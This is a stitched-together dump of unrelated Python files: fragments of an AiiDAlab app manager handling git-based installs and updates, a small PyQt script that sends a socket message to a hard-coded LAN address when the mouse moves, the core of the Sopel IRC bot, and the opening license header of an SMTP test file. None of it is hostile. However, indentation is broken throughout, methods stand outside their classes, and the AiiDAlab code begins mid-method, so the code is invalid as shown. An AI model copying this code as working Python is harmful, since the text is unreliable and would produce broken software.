        if f"refs/tags/{short_ref}".encode() in self._repo.refs.allkeys():
            return f"refs/tags/{short_ref}".encode()
        return None

    @staticmethod
    def _get_sha(obj):
        """Determine the SHA for a given commit object."""
        assert isinstance(obj, (Tag, Commit))
        # For annotated tags, obj.object is (type, sha) of the tagged commit.
        return obj.object[1] if isinstance(obj, Tag) else obj.id

    def find_versions(self):
        """Find versions available for this release line.

        When encountering an ambiguous release line name, i.e.,
        a shared branch and tag name, we give preference to the
        branch, because that is what git does in this situation.
        """
        assert self.short_ref or self.commit
        if self.commit:  # The release line is a commit.
            assert self.commit.encode() in self._repo.object_store
            yield self.commit.encode()
        else:
            ref = self._resolve_short_ref(self.short_ref)
            if ref is None:
                raise ValueError(
                    f"Unable to resolve {self.short_ref!r}. "
                    "Are you sure this is a valid git branch or tag?"
                )
            # The release line is a head (branch).
            if ref.startswith(b"refs/remotes/"):
                ref_commit = self._repo.get_peeled(ref)
                all_tags = {
                    ref
                    for ref in self._repo.get_refs()
                    if ref.startswith(b"refs/tags")
                }
                # Create lookup table from commit -> tags
                tags_lookup = defaultdict(set)
                for tag in all_tags:
                    tags_lookup[self._get_sha(self._repo[tag])].add(tag)
                # Determine all the tagged commits on the branch (HEAD)
                commits_on_head = self._repo.get_walker(self._repo.refs[ref])
                tagged_commits_on_head = [
                    c.commit.id
                    for c in commits_on_head
                    if c.commit.id in tags_lookup
                ]
                # Always yield the tip of the branch (HEAD), i.e., the latest commit on the branch.
                yield from tags_lookup.get(ref_commit, (ref,))
                # Yield all other tagged commits on the branch:
                for commit in tagged_commits_on_head:
                    if commit != ref_commit:
                        yield from tags_lookup[commit]
            # The release line is a tag.
            elif ref.startswith(b"refs/tags/"):
                yield ref

    def _resolve_commit(self, rev):
        """Map a revision to a commit."""
        if len(rev) in (20, 40) and rev in self._repo.object_store:
            return rev
        return self._get_sha(self._repo[rev])

    def resolve_revision(self, commit):
        """Map a given commit to a named version (branch/tag) if possible."""
        lookup = defaultdict(set)
        for version in self.find_versions():
            lookup[self._resolve_commit(version)].add(version)
        # Fall back to the commit itself when no name points at it.
        return lookup.get(commit, {commit})

    def _on_release_line(self, rev):
        """Determine whether the release line contains the provided version."""
        return rev in [
            self._resolve_commit(version) for version in self.find_versions()
        ]

    def current_revision(self):
        """Return the version currently installed on the release line.

        Returns None if the current revision is not on this release line.
        """
        current_commit = self._repo.head()
        on_release_line = self._on_release_line(current_commit)
        if on_release_line:
            return list(sorted(self.resolve_revision(current_commit)))[0]
        return None  # current revision not on the release line

    def is_branch(self):
        """Return True if release line is a branch."""
        return f"refs/remotes/origin/{self.line}".encode() in self._repo.refs
def __init__(self, name, app_data, aiidalab_apps_path, watch=True):
    """See class docstring for the meaning of the arguments."""
    super().__init__()
    if app_data is None:
        # App not present on the registry; only local info is available.
        self._registry_data = None
        self._release_line = None
    else:
        self._registry_data = self.AppRegistryData(**app_data)
        # The URL fragment (after '#') selects the release line; fall back
        # to the default branch when no fragment is given.
        parsed_url = urlsplit(self._registry_data.git_url)
        self._release_line = self._GitReleaseLine(
            self, parsed_url.fragment or AIIDALAB_DEFAULT_GIT_BRANCH
        )

    self.name = name
    self.path = os.path.join(aiidalab_apps_path, self.name)
    self.refresh_async()

    if watch:
        self._watch = AiidaLabAppWatch(self)
        self._watch.start()
    else:
        self._watch = None

def __repr__(self):
    app_data_argument = (
        None if self._registry_data is None else asdict(self._registry_data)
    )
    return (
        f"AiidaLabApp(name={self.name!r}, app_data={app_data_argument!r}, "
        f"aiidalab_apps_path={os.path.dirname(self.path)!r})"
    )
@traitlets.default("detached")
def _default_detached(self):
    """Provide default value for detached traitlet.

    Returns None (indeterminate) when the app is not installed.
    """
    if self.is_installed():
        modified = self._repo.dirty()
        if self._release_line is not None:
            revision = self._release_line.current_revision()
            # BUGFIX: the app is detached when it is NOT on a known revision
            # of the release line, or when it has local modifications.  The
            # previous expression (revision is not None and not modified)
            # was the exact inverse; refresh() computes detached as
            # "installed_version is UNKNOWN or modified", which this matches.
            return revision is None or modified
        return True
    return None
@traitlets.default("busy")
def _default_busy(self):  # pylint: disable=no-self-use
    # Apps start out idle.
    return False

@contextmanager
def _show_busy(self):
    """Apply this decorator to indicate that the app is busy during execution."""
    self.set_trait("busy", True)
    try:
        yield
    finally:
        self.set_trait("busy", False)

def in_category(self, category):
    # One should test what happens if the category won't be defined.
    # NOTE(review): raises AttributeError when the app is not registered
    # (self._registry_data is None) — confirm callers guard against this.
    return category in self._registry_data.categories

def is_installed(self):
    """The app is installed if the corresponding folder is present."""
    return os.path.isdir(self.path)

def _has_git_repo(self):
    """Check if the app has a .git folder in it."""
    try:
        Repo(self.path)
        return True
    except NotGitRepository:
        return False
def _install_app_version(self, version):
    """Install a specific app version.

    The version must be of the form 'git:<commit-or-ref>'; returns the
    normalized 'git:<rev>' string that was actually checked out.
    """
    assert self._registry_data is not None
    assert self._release_line is not None

    with self._show_busy():
        if not re.fullmatch(
            r"git:((?P<commit>([0-9a-fA-F]{20}){1,2})|(?P<short_ref>.+))", version
        ):
            raise ValueError(f"Unknown version format: '{version}'")

        if not os.path.isdir(self.path):  # clone first
            url = urldefrag(self._registry_data.git_url).url
            check_output(
                ["git", "clone", url, self.path],
                cwd=os.path.dirname(self.path),
                stderr=STDOUT,
            )

        # Switch to desired version
        rev = (
            self._release_line.resolve_revision(re.sub("git:", "", version))
            .pop()
            .encode()
        )
        if self._release_line.is_branch():
            # Branches: check the branch out and hard-reset it to the
            # requested revision so the working tree matches exactly.
            branch = self._release_line.line
            check_output(
                ["git", "checkout", "--force", branch], cwd=self.path, stderr=STDOUT
            )
            check_output(
                ["git", "reset", "--hard", rev], cwd=self.path, stderr=STDOUT
            )
        else:
            # Tags/commits are checked out directly (detached HEAD).
            check_output(
                ["git", "checkout", "--force", rev], cwd=self.path, stderr=STDOUT
            )

        self.refresh()
        return "git:" + rev.decode()

def install_app(self, version=None):
    """Installing the app.

    With version=None, install the release line's default and then switch
    to the newest compatible version when one exists.
    """
    if version is None:  # initial installation
        version = self._install_app_version(f"git:{self._release_line.line}")

        # switch to compatible version if possible
        available_versions = list(self._available_versions())
        if available_versions:
            return self._install_app_version(version=available_versions[0])

        return version

    # app already installed, just switch version
    return self._install_app_version(version=version)

def update_app(self, _=None):
    """Perform app update."""
    assert self._registry_data is not None
    try:
        # Best effort: fetch from the remote when it has new commits.
        if self._remote_update_available():
            self._fetch_from_remote()
    except AppRemoteUpdateError:
        pass
    available_versions = list(self._available_versions())
    return self.install_app(version=available_versions[0])
def uninstall_app(self, _=None):
    """Perform app uninstall by removing the app directory."""
    # Perform uninstall process.
    with self._show_busy():
        try:
            shutil.rmtree(self.path)
        except FileNotFoundError as error:
            # Explicitly chain the cause instead of the noisy implicit
            # "during handling ... another exception occurred" context.
            raise RuntimeError("App was already uninstalled!") from error
        self.refresh()
def _remote_update_available(self):
    """Check whether there are more commits at the origin (based on the registry)."""
    error_message_prefix = (
        "Unable to determine whether remote update is available: "
    )

    try:  # Obtain reference to git repository.
        repo = self._repo
    except NotGitRepository as error:
        raise AppRemoteUpdateError(f"{error_message_prefix}{error}")

    try:  # Determine sha of remote-tracking branch from registry.
        branch = self._release_line.line
        branch_ref = "refs/heads/" + branch
        local_remote_ref = "refs/remotes/origin/" + branch
        remote_sha = self._registry_data.gitinfo[branch_ref]
    except AttributeError:
        # _release_line / _registry_data is None for unregistered apps.
        raise AppRemoteUpdateError(f"{error_message_prefix}app is not registered")
    except KeyError:
        raise AppRemoteUpdateError(
            f"{error_message_prefix}no data about this release line in registry"
        )

    try:  # Determine sha of remote-tracking branch from repository.
        local_remote_sha = repo.refs[local_remote_ref.encode()].decode()
    except KeyError:
        return False  # remote ref not found, release line likely not a branch

    # Update is available iff registry and local clone disagree on the sha.
    return remote_sha != local_remote_sha

def _fetch_from_remote(self):
    """Fetch new objects from the app's registered git remote."""
    with self._show_busy():
        fetch(
            repo=self._repo,
            remote_location=urldefrag(self._registry_data.git_url).url,
        )

def check_for_updates(self):
    """Check whether there is an update available for the installed release line."""
    try:
        assert not self.detached
        remote_update_available = self._remote_update_available()
    except (AssertionError, AppRemoteUpdateError):
        # Indeterminate: app is detached or remote status unknown.
        self.set_trait("updates_available", None)
    else:
        available_versions = list(self._available_versions())
        if len(available_versions) > 0:
            local_update_available = self.installed_version != available_versions[0]
        else:
            local_update_available = None
        self.set_trait(
            "updates_available", remote_update_available or local_update_available
        )
def _available_versions(self):
    """Yield all available and compatible versions."""
    if self.is_installed() and self._release_line is not None:
        # Installed: enumerate versions from the local clone.
        versions = [
            "git:" + ref.decode() for ref in self._release_line.find_versions()
        ]
    elif self._registry_data is not None:
        # Not installed: derive versions from the registry's git info.
        def is_tag(ref):
            # Exclude peeled tag refs ('...^{}').
            return ref.startswith("refs/tags") and "^{}" not in ref

        def sort_key(ref):
            # Sort tags by parsed version; non-tag refs sort after tags.
            version = parse(ref[len("refs/tags/") :])
            return (not is_tag(ref), version, ref)

        versions = [
            "git:" + ref
            for ref in reversed(sorted(self._registry_data.gitinfo, key=sort_key))
            if is_tag(ref) or ref == f"refs/heads/{self._release_line.line}"
        ]
    else:
        versions = []

    for version in versions:
        if self._is_compatible(version):
            yield version

def _installed_version(self):
    """Determine the currently installed version."""
    if self.is_installed():
        if self._has_git_repo():
            modified = self._repo.dirty()
            if not (self._release_line is None or modified):
                revision = self._release_line.current_revision()
                if revision is not None:
                    return f"git:{revision.decode()}"
        # Installed, but the version cannot be determined.
        return AppVersion.UNKNOWN
    return AppVersion.NOT_INSTALLED
@traitlets.default("compatible")
def _default_compatible(self):  # pylint: disable=no-self-use
    # None means "not yet determined".
    return None

def _is_compatible(self, app_version=None):
    """Determine whether the currently installed version is compatible.

    Returns True/False when compatibility can be determined, otherwise
    None (app not registered, or version is not a string).
    """
    if app_version is None:
        app_version = self.installed_version

    def get_version_identifier(version):
        "Get version identifier from version (e.g. git:refs/tags/v1.0.0 -> v1.0.0)."
        if version.startswith("git:refs/tags/"):
            return version[len("git:refs/tags/") :]
        if version.startswith("git:refs/heads/"):
            return version[len("git:refs/heads/") :]
        if version.startswith("git:refs/remotes/"):  # remote branch
            return re.sub(r"git:refs\/remotes\/(.+?)\/", "", version)
        return version

    class RegexMatchSpecifierSet:
        """Interpret 'invalid' specifier sets as regular expression pattern."""

        def __init__(self, specifiers=""):
            self.specifiers = specifiers

        def __contains__(self, version):
            return re.match(self.specifiers, version) is not None

    def specifier_set(specifiers=""):
        # Use a PEP 440 specifier set when valid, else fall back to regex.
        try:
            return SpecifierSet(specifiers=specifiers, prereleases=True)
        except InvalidSpecifier:
            return RegexMatchSpecifierSet(specifiers=specifiers)

    def find_missing_requirements(requirements, packages):
        # Yield each requirement not fulfilled by any installed package.
        for requirement in requirements:
            if not any(package.fulfills(requirement) for package in packages):
                logging.debug(
                    f"{self.name}({app_version}): missing requirement '{requirement}'"
                )  # pylint: disable=logging-fstring-interpolation
                yield requirement  # missing requirement

    # Retrieve and convert the compatibility map from the app metadata.
    try:
        compat_map = self.metadata.get("requires", {"": []})
        compat_map = {
            specifier_set(app_version): [Requirement(r) for r in reqs]
            for app_version, reqs in compat_map.items()
        }
    except RuntimeError:  # not registered
        return None  # unable to determine compatibility
    else:
        if isinstance(app_version, str):
            # Determine version identifier (i.e. 'git:refs/tags/v1.2' is translated to 'v1.2')
            app_version_identifier = get_version_identifier(app_version)
            # Determine all specs that match the given version identifier.
            matching_specs = [
                app_spec
                for app_spec in compat_map
                if app_version_identifier in app_spec
            ]
            # Find all packages installed within in this environment.
            packages = find_installed_packages()
            # Determine whether any matching specifiers are compatible with the environment.
            missing_requirements = {
                spec: list(find_missing_requirements(compat_map[spec], packages))
                for spec in matching_specs
            }
            # Store missing requirements in compatibility_info trait to make reasons for
            # compatibility available to subscribers:
            self.compatibility_info.update(missing_requirements)
            # Return whether the app is at all compatible:
            return any(
                not any(missing_reqs)
                for missing_reqs in missing_requirements.values()
            )
        return None  # compatibility indetermined since the app is not installed
@throttled(calls_per_second=1)
def refresh(self):
    """Refresh app state."""
    with self._show_busy():
        # Hold notifications so observers see one consistent snapshot.
        with self.hold_trait_notifications():
            self.available_versions = list(self._available_versions())
            self.installed_version = self._installed_version()
            self.set_trait("compatible", self._is_compatible())
            if self.is_installed() and self._has_git_repo():
                self.installed_version = self._installed_version()
                modified = self._repo.dirty()
                self.set_trait(
                    "detached",
                    self.installed_version is AppVersion.UNKNOWN or modified,
                )
                self.check_for_updates()
            else:
                # Without a git repo these states cannot be determined.
                self.set_trait("updates_available", None)
                self.set_trait("detached", None)
def refresh_async(self):
    """Asynchronized (non-blocking) refresh of the app state."""
    # Fire-and-forget: the thread object does not need to be retained.
    Thread(target=self.refresh).start()
@property
def metadata(self):
    """Return metadata dictionary. Give the priority to the local copy (better for the developers)."""
    if self._registry_data is not None and self._registry_data.metainfo:
        return dict(self._registry_data.metainfo)
    if self.is_installed():
        try:
            with open(os.path.join(self.path, "metadata.json")) as json_file:
                return json.load(json_file)
        except IOError:
            # Missing or unreadable metadata.json.
            return dict()
    raise RuntimeError(
        f"Requested app '{self.name}' is not installed and is also not registered on the app registry."
    )

def _get_from_metadata(self, what):
    """Get information from metadata."""
    try:
        return "{}".format(self.metadata[what])
    except KeyError:
        # Field missing: return a human-readable explanation instead.
        if not os.path.isfile(os.path.join(self.path, "metadata.json")):
            return "({}) metadata.json file is not present".format(what)
        return 'the field "{}" is not present in metadata.json file'.format(what)
@property
def authors(self):
    # Metadata field: app authors.
    return self._get_from_metadata("authors")

@property
def description(self):
    # Metadata field: short app description.
    return self._get_from_metadata("description")

@property
def title(self):
    # Metadata field: human-readable app title.
    return self._get_from_metadata("title")

@property
def url(self):
    """Provide explicit link to Git repository."""
    return getattr(self._registry_data, "git_url", None)

@property
def more(self):
    # HTML link to this app's management page.
    return """<a href=./single_app.ipynb?app={}>Manage App</a>""".format(self.name)

@property
def _repo(self):
    """Returns Git repository."""
    if not self.is_installed():
        raise AppNotInstalledException("The app is not installed")
    return Repo(self.path)
|
linux.py | #! /usr/bin/env python3
import socket
import threading
from simple import *
from PyQt5.QtWidgets import QApplication, QMainWindow
from multiprocessing import Process
HOST = "192.168.2.5"
PORT = 65432
def socket_start():
    """Connect to HOST:PORT, spawn a reader thread, and send "hello".

    NOTE(review): the socket is closed as soon as the message is sent,
    leaving the daemon reader thread with a closed connection — confirm
    whether the reader was meant to keep the socket open.
    """
    # BUGFIX: use a context manager so the socket is also closed when
    # connect()/sendall() raises, instead of leaking the file descriptor.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((HOST, PORT))
        read_thread = ReadFromConnThread(s)
        read_thread.daemon = True
        read_thread.start()
        print("hello"+"have sent")
        s.sendall("hello".encode("utf-8"))
class ReadFromConnThread(threading.Thread):
    """Thread intended to read from an open socket connection.

    NOTE(review): run() is not overridden, so start() currently does
    nothing and the thread exits immediately — confirm whether a read
    loop was meant to be implemented here.
    """

    def __init__(self, conn):
        super().__init__()
        # Socket connection this thread would read from.
        self.conn = conn


flag_lr = False  # left is False right is True
class MainWindow(QMainWindow):
    """Main window; triggers socket_start once when the mouse crosses x > 300."""

    def __init__(self):
        super().__init__()
        # Build the interface class generated from the .ui file.
        self.ui = Ui_MainWindow()
        # Initialize the interface.
        self.ui.setupUi(self)

    def mouseMoveEvent(self, event):
        """Track the mouse; fire once when moving from the left into the right zone."""
        global flag_lr
        s = event.windowPos()
        self.setMouseTracking(True)
        self.ui.label.setText('X:' + str(s.x()))
        self.ui.label_2.setText('Y:' + str(s.y()))
        if s.x() > 300 and flag_lr == False:
            # Entered the right zone: send the trigger exactly once.
            print("发射")
            socket_start()
            flag_lr = True
        elif s.x() >= 300:
            # Still in the right zone: already fired, do nothing.
            pass
        elif s.x() <= 100:
            # Back in the left zone: re-arm the trigger.
            flag_lr = False
def window_start():
    """Create the Qt application, show the main window, and run the event loop."""
    app = QApplication([])
    mainw = MainWindow()
    mainw.show()
    app.exec_()


if __name__ == '__main__':
    # Run the GUI in a separate process.
    t2 = Process(target=window_start)
    t2.start()
bot.py | # coding=utf-8
"""
bot.py - Sopel IRC Bot
Copyright 2008, Sean B. Palmer, inamidst.com
Copyright 2012, Edward Powell, http://embolalia.net
Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
Licensed under the Eiffel Forum License 2.
http://sopel.chat/
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
import collections
import os
import re
import sys
import threading
import time
from sopel import tools
from sopel import irc
from sopel.db import SopelDB
from sopel.tools import stderr, Identifier
import sopel.tools.jobs
from sopel.trigger import Trigger
from sopel.module import NOLIMIT
from sopel.logger import get_logger
import sopel.loader
LOGGER = get_logger(__name__)
if sys.version_info.major >= 3:
unicode = str
basestring = str
py3 = True
else:
py3 = False
class Sopel(irc.Bot):
def __init__(self, config, daemon=False):
    """Set up bot state, load the database, and start the job scheduler."""
    irc.Bot.__init__(self, config)
    self._daemon = daemon  # Used for iPython. TODO something saner here
    # `re.compile('.*') is re.compile('.*')` because of caching, so we need
    # to associate a list with each regex, since they are unexpectedly
    # indistinct.
    self._callables = {
        'high': collections.defaultdict(list),
        'medium': collections.defaultdict(list),
        'low': collections.defaultdict(list)
    }
    self.config = config
    """The ``Config`` for the current Sopel instance."""
    self.doc = {}
    """
    A dictionary of command names to their docstring and example, if
    declared. The first item in a callable's commands list is used as the
    key in version *3.2* onward. Prior to *3.2*, the name of the function
    as declared in the source code was used.
    """
    self.command_groups = collections.defaultdict(list)
    """A mapping of module names to a list of commands in it."""
    self.stats = {}
    """
    A dictionary which maps a tuple of a function name and where it was
    used to the number of times it was used there.
    """
    self.times = {}
    """
    A dictionary mapping lower-case'd nicks to dictionaries which map
    function names to the time which they were last used by that nick.
    """
    # NOTE(review): attribute name looks like a typo of "activity", but it
    # is part of the public interface, so it is kept unchanged.
    self.acivity = {}

    self.server_capabilities = {}
    """A dict mapping supported IRCv3 capabilities to their options.

    For example, if the server specifies the capability ``sasl=EXTERNAL``,
    it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
    without any options will have ``None`` as the value.

    For servers that do not support IRCv3, this will be an empty set."""
    self.enabled_capabilities = set()
    """A set containing the IRCv3 capabilities that the bot has enabled."""
    self._cap_reqs = dict()
    """A dictionary of capability requests

    Maps the capability name to a list of tuples of the prefix ('-', '=',
    or ''), the name of the requesting module, the function to call if the
    the request is rejected, and the argument to the capability (or None).
    """

    self.privileges = dict()
    """A dictionary of channels to their users and privilege levels

    The value associated with each channel is a dictionary of Identifiers to a
    bitwise integer value, determined by combining the appropriate constants
    from `module`."""

    self.db = SopelDB(config)
    """The bot's database."""

    self.memory = tools.SopelMemory()
    """
    A thread-safe dict for storage of runtime data to be shared between
    modules. See `SopelMemory <#tools.Sopel.SopelMemory>`_
    """

    self.scheduler = sopel.tools.jobs.JobScheduler(self)
    self.scheduler.start()

    # Set up block lists
    # Default to empty
    if not self.config.core.nick_blocks:
        self.config.core.nick_blocks = []
    # BUGFIX: this condition previously re-tested nick_blocks, so
    # host_blocks was only defaulted when nick_blocks happened to be empty.
    if not self.config.core.host_blocks:
        self.config.core.host_blocks = []
    self.setup()
def setup(self):
    """Enumerate, load, and register all modules for this bot instance."""
    stderr("\nWelcome to Sopel. Loading modules...\n\n")
    modules = sopel.loader.enumerate_modules(self.config)

    error_count = 0
    success_count = 0
    for name in modules:
        path, type_ = modules[name]
        try:
            module, _ = sopel.loader.load_module(name, path, type_)
        except Exception as e:
            # Report where the failing import was raised from.
            error_count = error_count + 1
            filename, lineno = tools.get_raising_file_and_line()
            rel_path = os.path.relpath(filename, os.path.dirname(__file__))
            raising_stmt = "%s:%d" % (rel_path, lineno)
            stderr("Error loading %s: %s (%s)" % (name, e, raising_stmt))
        else:
            try:
                if hasattr(module, 'setup'):
                    module.setup(self)
                relevant_parts = sopel.loader.clean_module(
                    module, self.config)
            except Exception as e:
                # Module imported fine but its setup procedure failed.
                error_count = error_count + 1
                filename, lineno = tools.get_raising_file_and_line()
                rel_path = os.path.relpath(
                    filename, os.path.dirname(__file__)
                )
                raising_stmt = "%s:%d" % (rel_path, lineno)
                stderr("Error in %s setup procedure: %s (%s)"
                       % (name, e, raising_stmt))
            else:
                self.register(*relevant_parts)
                success_count += 1

    if len(modules) > 2:  # coretasks is counted
        stderr('\n\nRegistered %d modules,' % (success_count - 1))
        stderr('%d modules failed to load\n\n' % error_count)
    else:
        stderr("Warning: Couldn't load any modules")
def unregister(self, obj):
    """Remove a previously registered callable, job, or shutdown method."""
    if hasattr(obj, 'rule'):  # commands and intents have it added
        for rule in obj.rule:
            self._callables[obj.priority][rule].remove(obj)
    if hasattr(obj, 'interval'):
        # TODO this should somehow find the right job to remove, rather than
        # clearing the entire queue. Issue #831
        self.scheduler.clear_jobs()
    if getattr(obj, '__name__', None) == 'shutdown':
        self.shutdown_methods.remove(obj)

def register(self, callables, jobs, shutdowns):
    """Index callables by priority and rule, schedule jobs, store shutdowns."""
    self.shutdown_methods = shutdowns
    for callbl in callables:
        for rule in callbl.rule:
            self._callables[callbl.priority][rule].append(callbl)
        if hasattr(callbl, 'commands'):
            module_name = callbl.__module__.rsplit('.', 1)[-1]
            # TODO doc and make decorator for this. Not sure if this is how
            # it should work yet, so not making it public for 6.0.
            category = getattr(callbl, 'category', module_name)
            self.command_groups[category].append(callbl.commands[0])
        for command, docs in callbl._docs.items():
            self.doc[command] = docs
    for func in jobs:
        for interval in func.interval:
            job = sopel.tools.jobs.Job(interval, func)
            self.scheduler.add_job(job)
class SopelWrapper(object):
    """Proxy around the bot that defaults destinations from the trigger."""

    def __init__(self, sopel, trigger):
        # The custom __setattr__ for this class sets the attribute on the
        # original bot object. We don't want that for these, so we set them
        # with the normal __setattr__.
        object.__setattr__(self, '_bot', sopel)
        object.__setattr__(self, '_trigger', trigger)

    def __dir__(self):
        classattrs = [attr for attr in self.__class__.__dict__
                      if not attr.startswith('__')]
        return list(self.__dict__) + classattrs + dir(self._bot)

    def __getattr__(self, attr):
        # Delegate unknown attribute reads to the wrapped bot.
        return getattr(self._bot, attr)

    def __setattr__(self, attr, value):
        # Attribute writes go through to the wrapped bot as well.
        return setattr(self._bot, attr, value)

    def say(self, message, destination=None, max_messages=1):
        """Say message; destination defaults to the triggering channel/nick."""
        if destination is None:
            destination = self._trigger.sender
        self._bot.say(message, destination, max_messages)

    def action(self, message, destination=None):
        """Send an action; destination defaults to the trigger's sender."""
        if destination is None:
            destination = self._trigger.sender
        self._bot.action(message, destination)

    def notice(self, message, destination=None):
        """Send a notice; destination defaults to the trigger's sender."""
        if destination is None:
            destination = self._trigger.sender
        self._bot.notice(message, destination)

    def reply(self, message, destination=None, reply_to=None, notice=False):
        """Reply to reply_to (defaults to the triggering nick) in destination."""
        if destination is None:
            destination = self._trigger.sender
        if reply_to is None:
            reply_to = self._trigger.nick
        self._bot.reply(message, destination, reply_to, notice)
def call(self, func, sopel, trigger):
    """Invoke plugin callable *func* for *trigger*, enforcing its rate limit.

    Admins and unblockable callables bypass rate limiting.  A callable may
    return ``NOLIMIT`` to avoid having this invocation counted against its
    rate window.
    """
    nick = trigger.nick
    if nick not in self.times:
        self.times[nick] = dict()
    # Rate limiting applies only to non-admin, blockable callables with a
    # positive rate that have been called by this nick before.
    if not trigger.admin and \
            not func.unblockable and \
            func.rate > 0 and \
            func in self.times[nick]:
        timediff = time.time() - self.times[nick][func]
        if timediff < func.rate:
            # NOTE(review): the timestamp is refreshed even when the call is
            # blocked, so a blocked attempt re-arms the rate window — confirm
            # this is intended before changing.
            self.times[nick][func] = time.time()
            LOGGER.info(
                "%s prevented from using %s in %s: %d < %d",
                trigger.nick, func.__name__, trigger.sender, timediff,
                func.rate
            )
            return
    try:
        exit_code = func(sopel, trigger)
    except Exception:
        # Plugin errors are reported via the bot's error handler; the
        # invocation still counts against the rate limit (exit_code None).
        exit_code = None
        self.error(trigger)
    if exit_code != NOLIMIT:
        self.times[nick][func] = time.time()
def dispatch(self, pretrigger):
    """Route a parsed IRC line to every registered callable it matches.

    Each callable whose rule regexp matches the message text is invoked
    (in its own thread when ``func.thread`` is set), unless the sender is
    nick- or host-blocked, the event does not match, or a required intent
    is absent.  Blocked invocations are collected and logged once.
    """
    args = pretrigger.args
    event, args, text = pretrigger.event, args, args[-1]
    # Only compute block status when any blocking is configured at all.
    if self.config.core.nick_blocks or self.config.core.host_blocks:
        nick_blocked = self._nick_blocked(pretrigger.nick)
        host_blocked = self._host_blocked(pretrigger.host)
    else:
        nick_blocked = host_blocked = None
    list_of_blocked_functions = []
    for priority in ('high', 'medium', 'low'):
        items = self._callables[priority].items()
        for regexp, funcs in items:
            match = regexp.match(text)
            if not match:
                continue
            # One Trigger/wrapper pair is shared by all funcs on this rule.
            trigger = Trigger(self.config, pretrigger, match)
            wrapper = self.SopelWrapper(self, trigger)
            for func in funcs:
                # Blocked senders are skipped unless the callable is
                # unblockable or the trigger came from an admin.
                if (not trigger.admin and
                        not func.unblockable and
                        (nick_blocked or host_blocked)):
                    function_name = "%s.%s" % (
                        func.__module__, func.__name__
                    )
                    list_of_blocked_functions.append(function_name)
                    continue
                if event not in func.event:
                    continue
                # Callables with declared intents only fire for those intents.
                if (hasattr(func, 'intents') and
                        trigger.tags.get('intent') not in func.intents):
                    continue
                if func.thread:
                    targs = (func, wrapper, trigger)
                    t = threading.Thread(target=self.call, args=targs)
                    t.start()
                else:
                    self.call(func, wrapper, trigger)
    if list_of_blocked_functions:
        if nick_blocked and host_blocked:
            block_type = 'both'
        elif nick_blocked:
            block_type = 'nick'
        else:
            block_type = 'host'
        LOGGER.info(
            "[%s]%s prevented from using %s.",
            block_type,
            trigger.nick,
            ', '.join(list_of_blocked_functions)
        )
def _host_blocked(self, host):
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
    """Run every registered module shutdown hook, logging any failure.

    A failing hook is reported to stderr and does not prevent the
    remaining hooks from running.
    """
    hooks = self.shutdown_methods
    stderr('Calling shutdown for %d modules.' % (len(hooks),))
    for hook in hooks:
        try:
            stderr(
                "calling %s.%s" % (
                    hook.__module__, hook.__name__,
                )
            )
            hook(self)
        except Exception as e:
            stderr(
                "Error calling shutdown method for module %s:%s" % (
                    hook.__module__, e
                )
            )
def cap_req(self, module_name, capability, arg=None, failure_callback=None):
    """Tell Sopel to request a capability when it starts.

    By prefixing the capability with `-`, it will be ensured that the
    capability is not enabled. Similarly, by prefixing the capability with
    `=`, it will be ensured that the capability is enabled. Requiring and
    disabling is "first come, first served"; if one module requires a
    capability, and another prohibits it, this function will raise an
    exception in whichever module loads second. An exception will also be
    raised if the module is being loaded after the bot has already started,
    and the request would change the set of enabled capabilities.

    If the capability is not prefixed, and no other module prohibits it, it
    will be requested. Otherwise, it will not be requested. Since
    capability requests that are not mandatory may be rejected by the
    server, as well as by other modules, a module which makes such a
    request should account for that possibility.

    The actual capability request to the server is handled after the
    completion of this function. In the event that the server denies a
    request, the `failure_callback` function will be called, if provided.
    The arguments will be a `Sopel` object, and the capability which was
    rejected. This can be used to disable callables which rely on the
    capability.

    If ``arg`` is given, and does not exactly match what the server
    provides or what other modules have requested for that capability, it
    is considered a conflict.
    """
    # TODO raise better exceptions
    cap = capability[1:]
    prefix = capability[0]

    # Each entry is a tuple (prefix, module_name, failure_callback, arg);
    # see the entry.append(...) calls below.
    entry = self._cap_reqs.get(cap, [])
    # Differing args for the same capability are always a conflict.
    if any((ent[3] != arg for ent in entry)):
        raise Exception('Capability conflict')

    if prefix == '-':
        if self.connection_registered and cap in self.enabled_capabilities:
            raise Exception('Can not change capabilities after server '
                            'connection has been completed.')
        # Prohibiting conflicts with any prior non-prohibit request.
        if any((ent[0] != '-' for ent in entry)):
            raise Exception('Capability conflict')
        entry.append((prefix, module_name, failure_callback, arg))
        self._cap_reqs[cap] = entry
    else:
        if prefix != '=':
            # Unprefixed request: the whole string is the capability name.
            cap = capability
            prefix = ''
        if self.connection_registered and (cap not in
                                           self.enabled_capabilities):
            raise Exception('Can not change capabilities after server '
                            'connection has been completed.')
        # Non-mandatory will callback at the same time as if the server
        # rejected it.
        if any((ent[0] == '-' for ent in entry)) and prefix == '=':
            raise Exception('Capability conflict')
        entry.append((prefix, module_name, failure_callback, arg))
        self._cap_reqs[cap] = entry
|
test_smtp.py | # -*- coding: utf-8 -*-
# (The MIT License)
#
# Copyright (c) 2013-2021 Kura
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
